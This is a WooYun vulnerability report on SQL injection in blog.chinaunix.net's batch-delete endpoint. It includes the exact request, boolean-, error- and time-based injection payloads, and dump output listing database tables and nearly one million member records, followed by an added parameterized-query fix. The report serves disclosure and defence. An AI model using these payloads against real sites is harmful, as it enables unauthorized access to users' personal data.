Vulnerability summary

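Bug ID: wooyun-2015-0116514

Title: MySQL injection on a ChinaUnix site exposes nearly one million users' information

Vendor: ChinaUnix

Author: 路人甲

Submitted: 2015-05-27 16:32

Fixed: 2015-07-16 09:24

Published: 2015-07-16 09:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by the vendor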

Source: http://www.wooyun.org

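Vulnerability details

Disclosure status:

2015-05-27: Details reported to the vendor; awaiting vendor handling
2015-06-01: Vendor confirmed; details visible to the vendor only
2015-06-11: Details disclosed to core white hats and experts in related fields
2015-06-21: Details disclosed to regular white hats
2015-07-01: Details disclosed to intern white hats
2015-07-16: Details disclosed to the public

Brief description:

233

Detailed description: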

POST /blog/LogicDelBatch.html HTTP/1.1
Content-Length: 154
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: blog.chinaunix.net
Cookie: **********************
Host: blog.chinaunix.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

allsel=on&ids%5b%5d=sqlfind

Proof of vulnerability:

---
Parameter: ids[] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: allsel=on&ids[]=a) AND 9396=9396 AND (5600=5600
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: allsel=on&ids[]=a) AND (SELECT 9889 FROM(SELECT COUNT(*),CONCAT(0x7176767a71,(SELECT (ELT(9889=9889,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1816=1816
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: allsel=on&ids[]=a) AND (SELECT * FROM (SELECT(SLEEP(5)))MReN) AND (7930=7930
---
[16:25:24] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: cublog
[61 tables]
+---------------------------+
| tbl_album |
| tbl_attachments |
| tbl_blog |
| tbl_blog_draft |
| tbl_blog_field_1 |
| tbl_blog_field_10 |
| tbl_blog_field_11 |
| tbl_blog_field_12 |
| tbl_blog_field_13 |
| tbl_blog_field_14 |
| tbl_blog_field_16 |
| tbl_blog_field_17 |
| tbl_blog_field_18 |
| tbl_blog_field_2 |
| tbl_blog_field_20 |
| tbl_blog_field_21 |
| tbl_blog_field_22 |
| tbl_blog_field_24 |
| tbl_blog_field_25 |
| tbl_blog_field_26 |
| tbl_blog_field_27 |
| tbl_blog_field_28 |
| tbl_blog_field_29 |
| tbl_blog_field_3 |
| tbl_blog_field_30 |
| tbl_blog_field_4 |
| tbl_blog_field_5 |
| tbl_blog_field_6 |
| tbl_blog_field_8 |
| tbl_blog_field_9 |
| tbl_class |
| tbl_collection_links |
| tbl_common_config |
| tbl_index_del |
| tbl_issue |
| tbl_link |
| tbl_member |
| tbl_member_failedlogin |
| tbl_member_field |
| tbl_member_friend |
| tbl_member_group |
| tbl_member_notification |
| tbl_member_reply |
| tbl_member_set |
| tbl_member_visitor |
| tbl_moving_error_url |
| tbl_outside_articles |
| tbl_pic |
| tbl_pm_private_memberlist |
| tbl_pm_private_message |
| tbl_pm_system_message |
| tbl_pm_system_status |
| tbl_sitemap |
| tbl_sitemap_log |
| tbl_special |
| tbl_special_articles |
| tbl_spider_moving |
| tbl_user_sinaid |
| tbl_zhuanti_excels |
| tbl_zhuanti_keywords |
| uchome_space |
+---------------------------+
Database: cublog
+------------+---------+
| Table | Entries |
+------------+---------+
| tbl_member | 942905 |
+------------+---------+

Remediation:

~~

Copyright notice: when reposting, please credit the source 路人甲@乌云
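
The remediation field of the report is blank. As an added example (not code from the report or from ChinaUnix), this is one way a batch soft-delete handler can accept a repeated ids[] field safely: each value must be a plain decimal integer and is bound as a parameter in the IN (...) list, so the SQL text never contains request data. The posts table, its columns, the ownership check, the batch limit and the use of Python with SQLite in place of the site's PHP/MySQL stack are assumptions made for illustration.

```python
import re
import sqlite3

MAX_BATCH = 100                       # assumed upper bound on ids per request
_ID_RE = re.compile(r"[0-9]{1,18}")   # ASCII decimal digits only, fits a 64-bit int


def parse_ids(raw_ids):
    """Turn the repeated ids[] form values into ints, or raise ValueError."""
    if not raw_ids or len(raw_ids) > MAX_BATCH:
        raise ValueError("empty or oversized id batch")
    ids = []
    for raw in raw_ids:
        if not isinstance(raw, str) or not _ID_RE.fullmatch(raw):
            raise ValueError("non-numeric id rejected")
        ids.append(int(raw))
    return ids


def logic_delete_batch(conn, owner_id, raw_ids):
    """Soft-delete the caller's own posts; returns the number of rows changed."""
    ids = parse_ids(raw_ids)
    # One "?" per id: the SQL text depends only on how many ids were sent,
    # never on their content. The values travel separately as bound parameters.
    placeholders = ",".join("?" * len(ids))
    sql = ("UPDATE posts SET deleted = 1 "
           "WHERE owner_id = ? AND deleted = 0 AND id IN (" + placeholders + ")")
    with conn:
        cur = conn.execute(sql, [owner_id, *ids])
    return cur.rowcount


def demo_db():
    """Constructed sample data (hypothetical schema): posts 1-3 by user 7, post 4 by user 8."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, owner_id INTEGER,"
                 " deleted INTEGER NOT NULL DEFAULT 0)")
    conn.executemany("INSERT INTO posts (id, owner_id) VALUES (?, ?)",
                     [(1, 7), (2, 7), (3, 7), (4, 8)])
    return conn


if __name__ == "__main__":
    db = demo_db()
    print(logic_delete_batch(db, 7, ["1", "2", "4"]))   # post 4 belongs to user 8
    try:  # ids[] value quoted from the report's boolean-based test
        logic_delete_batch(db, 7, ["a) AND 9396=9396 AND (5600=5600"])
    except ValueError as exc:
        print("rejected:", exc)
```

Validation and binding are both kept on purpose: the integer check gives the caller a clean rejection, and the bound parameters keep the query safe even if the check is later loosened.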


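Response to the vulnerability

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-06-01 09:23

Vendor reply:

Thanks for the help.

Latest status:

None yet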